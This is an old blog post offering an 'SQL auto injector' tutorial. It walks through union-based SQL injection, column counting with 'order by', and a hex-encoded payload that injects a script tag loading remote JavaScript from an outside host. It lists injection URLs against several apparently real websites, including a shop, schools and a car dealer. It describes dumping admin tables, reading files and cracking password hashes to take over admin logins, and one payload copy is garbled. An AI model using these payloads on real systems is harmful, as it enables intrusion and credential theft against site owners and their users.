Monday, March 12, 2012

Basic SQL TOOL Auto Injector v1.0 (Javascript)

Tool:
Must have Old Version of firefox ( >4 ) Ex: firefox 3.6 or safari

Hacking Code:
----------------
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29

Method:
---------
Check for vulnerable in websites?
In order to check for the vulnerabilities in website we should do the followings

http://www.targetdomain.com/index.php?id=4′

we can use ‘ this strings for check any vulnerabilities in the target website or using ” char,this will showing some error in the database connection.

let say we found vulnerable sites, then we can extract information from database and gain some confidential data.

First.
-----
We need to find the how many columns in the database

http://www.targetdomain.com/index.php?id=4 order by 1–

and we will increasing the number until we get an error.

http://www.targetdomain.com/index.php?id=4 order by 5–
http://www.targetdomain.com/index.php?id=4 order by 10–

Second.
---------
We need to find the highest ‘order by’ number without the error. For this example lets assume that i got an error at ‘order by 11–’ which means i then need to replace that 11 with a 10 again (which was the highest number i could put in without getting any errors). That is the amount of columns in the database!

Third.
-------
So let say there are 10 columns in database.Now we need to find out which columns that are vulnerable to SQL injection. We will use this query.

http://www.targetdomain.com/index.php?id=-4 union select 1,2,3,4,5,6,7,8,9,10–

Notice that i put a single – in front of the id number (id=-4)
Since there is no page with the id -4 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.

Okay lets say the numbers 3, 6 and 9 popped up on the site. These are the vulnerable tables. So, we put this code (in either 1 of the vulnerable tables but i chose 3 for this example)

http://www.targetdomain.com/index.php?id=-4 union select all 1,2,
%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c28f7363726970743e%29%29,4,5,6,7,8,9,10--

Example website:
--------------------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19--

Click Table Website Tu
Bukan information_schema ya :D!!
Tengok Gambar Di Bawah :D




Now, you can find the database for this website. To find the username and password, try click example: madhop_db
You will find this column

   *  admin_user
   *  album
   *  banner
   *  category
   *  color_table
   *  countries
   *  currency_tbl,
   *  download_detail
   *  download_list
   *  gallery_detail
   *  member
   *  news
   *  news_category
   *  order_detail
   *  order_list
   *  product
   *  product_photo
   *  province_tbl
   *  shop
   *  video
   *  video_category
   *  webboard_forum
   *  webboard_forumen
   *  webboard_topic
   *  webboard_topicen

Now we have some tables information and we need to have a small brain to find the tables. :p

Example : admin_user, tblUser, tblAdmin, etc

Click admin_user, Once we found the actual table (username,password,etc) click start.

Walla!,we have the admin login. You can find the password using "read files"  method.
Click "read files" on above in this page and click load file.

Anda Dah Dapat Username/Password :D


If the data is encrypted we need to find some md5decrypter online.To find admin we can use tools like havij,admin page finder,etc.

EXAMPLE:
-----------
http://www.madhop.com/en/news.php?act=detail&id=-193 union select all 1,2,3,4,5,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19--

http://sju.ca/about/news.php?id=-80+union+select+all+1,2,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29,4--

http://www.entp.edu.dz/actualite/news.php?id=-44%20union%20select%20all%201,2,3,4,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29--


http://www.calponycars.com/prodDetail.php?prodId=-349%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,%28%280x3c73637269707420747970653d22746578742f6a61766173637269707422207372633d22687474703a2f2f796f75726a6176617363726970742e636f6d2f3131333031323032303231322f73716c2e6a73223e3c2f7363726970743e%29%29--

Credit by p4Ng5 H1t4m a.k.a 4p13h Mh-Cr3w

No comments:

Post a Comment